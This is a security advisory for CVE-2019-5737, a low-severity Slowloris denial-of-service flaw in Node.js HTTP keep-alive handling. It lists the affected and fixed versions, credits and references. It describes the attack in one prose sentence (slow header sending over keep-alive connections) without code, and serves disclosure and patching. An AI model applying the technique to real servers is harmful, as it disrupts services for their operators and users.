ASA-2019-00120 – Node.js: Slowloris HTTP Denial of Service with keep-alive


Allele Security Alert

ASA-2019-00120

Identifier(s)

ASA-2019-00120, CVE-2019-5737

Title

Slowloris HTTP Denial of Service with keep-alive

Vendor(s)

The Node.js Project

Product(s)

Node.js

Affected version(s)

All versions of Node.js 6 (LTS “Boron”)
All versions of Node.js 8 (LTS “Carbon”)
All versions of Node.js 10 (LTS “Dubnium”)
All versions of Node.js 11 (Current)

Fixed version(s)

Node.js 11.10.1 (Current)
Node.js 10.15.2 (LTS “Dubnium”)
Node.js 8.15.1 (LTS “Carbon”)
Node.js 6.17.0 (LTS “Boron”)

Proof of concept

Unknown

Description

All actively supported release lines are vulnerable and the severity is LOW. An attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep-alive mode and by sending headers very slowly thereby keeping the connection and associated resources alive for a long period of time. Attack potential is mitigated by the use of a load balancer or other proxy layer.

This vulnerability is an extension of CVE-2018-12121, addressed in November, 2018. The 40 second timeout and its adjustment by server.headersTimeout apply to this fix as in CVE-2018-12121.

Technical details

Unknown

Credits

Marco Pracucci and Matteo Collina

Reference(s)

February 2019 Security Releases
https://nodejs.org/en/blog/vulnerability/february-2019-security-releases/

http: prevent slowloris with keepalive connections
https://github.com/nodejs/node/commit/1a7302bd48

CVE-2019-5737
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5737

CVE-2019-5737
https://nvd.nist.gov/vuln/detail/CVE-2019-5737

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: March 6, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.